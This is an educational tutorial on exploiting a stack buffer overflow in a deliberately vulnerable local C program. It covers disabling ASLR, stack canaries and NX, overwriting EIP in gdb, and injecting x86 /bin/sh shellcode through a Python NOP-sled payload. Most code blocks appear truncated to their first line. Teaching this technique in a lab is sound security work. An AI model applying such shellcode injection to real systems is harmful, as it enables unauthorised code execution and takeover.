Buffer Overflow: Code Execution By Shellcode Injection
By this third article of the Buffer Overflow series we should be familiar with:
- buffer,
- memory segmentation,
- buffer overflow,
- gdb,
- assembly and disassembly
In this article we will details how to exploit a buffer overflow in order to achieve remote code execution via shellcode injection.
Setting up our environment
As previously stated in the introduction, today’s memory layout of a running application has become significantly more complex due to the implementation of various security measures. These measures have made exploiting vulnerabilities such as buffer overflow quite challenging. Some of the common and highly effective security measures include for example:
- ASLR protection (Address Space Layout Randomization) randomly arranges the address space positions of key data areas of a program. At each new execution, the stored data is placed in different memory spaces.
- SSP protection (Stack-Smashing Protector) detects stack buffer overrun by aborting if a secret value on the stack is changed. These secret values (”Canaries”) are inserted between data segments in the stack. The integrity of the secrets are checked and the program immediately interrupt if modification is detected.
- No possible Stack or Heap execution, these memory spaces are intended to only contain variables and pointers but never executable code.
For the learning purpose of our example, we are going to disable these protections and force a 32 bits compilation.
1 | [hg8@archbook ~]$ sudo echo 0 > /proc/sys/kernel/randomize_va_space # disable ASLR |
Flags explanation:
-m32
: Compile in 32 bits
-g
: Generates debug information to be used by GDB debugger.
-mpreferred-stack-boundary=2
: Ensure that the stack is set up into 4-bytes increments, preventing optimisation of the stack segmentation that could make our example confusing.
-fno-stack-protector
: Disable Stack Smashing protection.
-z execstack
: Disable NX (allowing stack segment to be executable).
Overflowing the stack
Let’s now open our program with gdb
:
1 | [hg8@archbook ~]$ gdb ./vuln |
In the previous article, the disassembly of our example program allowed us to understand what our program stack will looks like:
In order to exploit the buffer overflow in our program, we are going to pass an input bigger than 500 characters to our buffer[]
variable.
It’s important to note that, even though the stack itself grows upward from high-memory to lower-memory addresses, the buffer itself is filled from lower to higher memory addresses.
In our example, when we input a string longer than 500 characters, it will begin overwriting the register that’s lower on the stack (and higher up in the memory).
For example if we use a 501 characters long input, the following will happen:
Well let’s now see in practice what happens when we input a 501 long string to our program.
We can use python to generate a string made of 501 occurrences of the letter ‘A’ (0x41
is hexadecimal for 65, which is the ASCII-code for the letter ‘A’).
From gdb
this can be done using the run
command:
1 | [hg8@archbook ~]$ gdb ./vuln |
Nothing happens, it’s normal since EBX is not a critical register in our example program.
Let’s now add a breakpoint in order to highlight how the EBX register got overwritten with an extra x41
(’A’):
1 | (gdb) disassemble main |
Now by checking the registers with the info registers
commands we can verify that the ebx
address is being overwritten:
1 |
|
By inputting a 504 character long string, we overwrite the whole ebx
register:
1 | (gdb) run $(python -c "print('\x41'*504)") |
We can also visualize what the stack looks like in memory from gdb with x/12x $sp-20
. Let’s decompose the command to understand how it works:
x/14x
displays 14 bytes of memory in a hexadecimal format.$sp+460
starts the memory reading from the stack pointer ($sp) position offset by +460, which is around where ourebx
register is located.
Beforehand let’s slightly tweak our payload to make it more visible on the stack representation, instead of ‘A’ we will replace the 4 overflowed bytes with ‘B’ (x42
):
1 | (gdb) run $(python -c "print('\x41'*500+'\x42'*4)") |
Now let’s overwrite every register following our buffer, ebx
with ‘BBBB’, ebp
with ‘CCCC’ and eip
with ‘DDDD’:
1 | (gdb) run $(python -c "print('\x41'*500+'\x42'*4+'\x43'*4+'\x44'*4)") |
Our stack now looks like this:
We achieved full control of adjacent memory registers. So what can we do with such access ? Let’s move on to exploitation.
Exploitation
The last register we manage to overwrite is eip
.
The EIP register holds the “Extended Instruction Pointer” for the stack. In other words, it tells the computer where to go next to execute the next command and controls the flow of a program.
This means that if we can input malicious code into the program, we can use the buffer overflow to overwrite the eip
register to point to the memory address of the malicious code.
And that’s exactly what we are going to do now, and we will start by crafting a shellcode.
Shellcode Creation
First of all, what is a shellcode ?
A shellcode is a small piece of code used as payload when exploiting an overflow vulnerability. Historically it’s called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine.
In our case, we will inject a shellcode into our buffer in order to have it get executed later on.
Wikipedia defines the writing of shellcode “as much of an art as it is a science”, since shellcode depends on the operating system, CPU architecture and is commonly written in Assembly.
You can easily find plenty on the internet. For our example we are going to use a very common and simple shellcode for x86 which executes a /bin/sh
shell.
Here is a quick overview of this shellcode:
1 | xor eax, eax ; put 0 into eax |
This code can be assembled and linked using nasm
to create an executable binary program as an Executable and Linking Format (ELF) binary:
1 | [hg8@archbook ~]$ nasm -f elf shellcode.asm |
Now we need to disassemble it in order to get the shellcodes bytes:
1 | [hg8@archbook ~]$ objdump -d -M intel shellcode.o |
We can now easily extract the hexadecimal shellcode, either by hand or with some bash-fu:
1 | [hg8@archbook ~]$ objdump -d ./shellcode.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' |
Shellcode Testing
Now to be sure our shellcode works, let’s write a simple program to run it on our machine:
1 |
|
Let’s run it:
1 | [hg8@archbook ~]$ gcc -m32 -z execstack shellcode-loader.c -o shellcode-loader |
All is good, let’s now inject the shellcode into our vulnerable program.
Shellcode Injection
We now need to make our vulnerable program execute our shellcode. To do so we will inject the shellcode in the input data payload, for it to be stored in our buffer.
The next step will be to have our return address point to the memory location where our shellcode is stored in order for it to be executed.
Since memory may change a bit during program execution and we don’t know the exact location of our shellcode we will use the NOP-sled technique.
NOP-sled
A NOP sled, also known as a NOP slide, is a technique used to help ensure that a shellcode is executed even if the exact memory location of the exploit payload is not known.
The NOP, or No-Operation, instruction is a machine language instruction that performs no operation and takes up one machine cycle. NOP sled takes advantage of this instruction by creating a sequence of NOP instructions that can serve as a landing pad for the program execution flow.
We will craft a sequence of NOP instructions followed by our shellcode. The idea is that if the execution flow is redirected to any point within the NOP sled, the CPU will execute the NOP instructions and keep moving forward until it hits the shellcode.
When utilizing a NOP-sled, the precise location of the shellcode within the buffer doesn’t matter for the return address to reach it. What we do know is that it will reside somewhere within the buffer, and its length will be 25 bytes.
With our shellcode of 25 bytes and a payload of 512 bytes, we have 487 bytes to fill with NOP, which we will divide like so:
Payload: [ NOP SLED] [ SHELLCODE ] [ RETURN ADDRESS ]
Crafting our exploit
We will use a Python script to craft our exploit, since we use Python 3 it’s important to use bytes
type.
In addition, since we are working on x86, the hexadecimal value for NOP instructions is 0x90
.
1 | import sys |
Since we don’t know for now what the return address (eip
) will be, we currently replace it with C
(x43
) that we repeat 10 times to have a bit of padding between our shellcode and the stack.
Our NOP sled is being repeated 447 times since we need to write 512 bytes to overwrite the return address:
1 | 512 - (4 * 10) - 25 = 447 |
Here is what we expect our memory to looks like after execution of our payload:
Let’s run our payload:
1 | [hg8@archbook ~]$ gdb ./vuln |
We get exactly what we were looking for, a segmentation fault since we didn’t provide a valid return address yet. Let’s now inspect our memory to define what the return address should be.
When inspecting the memory, we can see our payload was injected as expected:
Let’s now pick any memory address within the x90
NOP sled area before the shellcode to be our return address. From the screenshot above we can pick 0xffffce30
for example.
Since Intel CPUs are little endian, we need to reverse the address for our payload.
Our script become:
1 | import sys |
If everything goes fine, our program strcpy
will copy our string, and when it will try to return it will load our injected return value, redirecting to the NOP Sled, followed by the shellcode that will then be executed.
Let’s give it a try:
1 | [hg8@archbook ~]$ gdb ./vuln |
And here we go! The buffer overflow was successfully exploited, resulting in obtaining access to a command shell.
References
- Stack Smashing Protector
- Address space layout randomization
- Understanding stack alignment enforcement
- Buffer Overflow - Exploitation
- Buffer Overflow - Protective Countermeasures
- Data structure alignment
- How to look at the stack with gdb
- Writing Shellcode for Linux and *BSD
- Linux Shellcode 101: From Hell to Shell
- Linux/x64 - execve(/bin/sh) Shellcode (23 bytes)
- Two basic ways to run and test shellcode
- Running a Buffer Overflow Attack - Computerphile